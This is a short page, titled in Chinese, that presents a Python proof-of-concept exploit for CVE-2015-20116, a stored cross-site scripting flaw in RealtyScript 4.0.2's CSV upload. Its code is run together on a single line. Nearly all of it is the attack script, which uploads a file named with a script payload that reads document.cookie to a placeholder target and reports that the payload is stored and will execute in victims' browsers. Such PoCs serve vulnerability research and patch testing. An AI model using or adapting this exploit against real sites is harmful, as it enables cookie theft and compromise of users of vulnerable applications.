CVE-2015-20116: RealtyScript 4.0.2 CSV文件上传存储型XSS漏洞

#!/usr/bin/env python3 # CVE-2015-20116 PoC - RealtyScript CSV File Upload XSS # This PoC demonstrates uploading a file with malicious XSS payload in filename import requests import sys target_url = "http://target.com/upload" # Replace with actual target URL # XSS payload embedded in filename malicious_filename = '<script>alert(document.cookie)</script>.csv' def exploit_csv_xss(): """Upload CSV file with XSS payload in filename""" try: files = { 'file': (malicious_filename, 'test,data\n1,2', 'text/csv') } response = requests.post(target_url, files=files) print(f"[*] Request sent with malicious filename: {malicious_filename}") print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: print("[+] File uploaded successfully - XSS payload stored") print("[+] When file is displayed, the script will execute in victim's browser") else: print("[-] Upload failed") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": exploit_csv_xss()